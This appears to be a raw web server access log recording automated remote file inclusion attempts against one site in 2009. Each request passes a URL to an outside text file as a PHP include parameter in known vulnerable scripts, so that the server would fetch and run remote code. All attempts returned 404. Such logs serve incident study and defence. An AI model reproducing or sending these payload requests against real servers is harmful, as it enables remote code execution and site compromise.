82.193.15.3 - - [30/Oct/2009:09:59:33 -0700] "GET /logs/access_090807.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:59:33 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:09:59:44 -0700] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:09:59:44 -0700] "GET /logs/access_080701.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:09:59:44 -0700] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:59:56 -0700] "GET /logs/access_090104.log//skin/zero_vote/error.php?dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:00:11 -0700] "GET /logs/access_080213.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
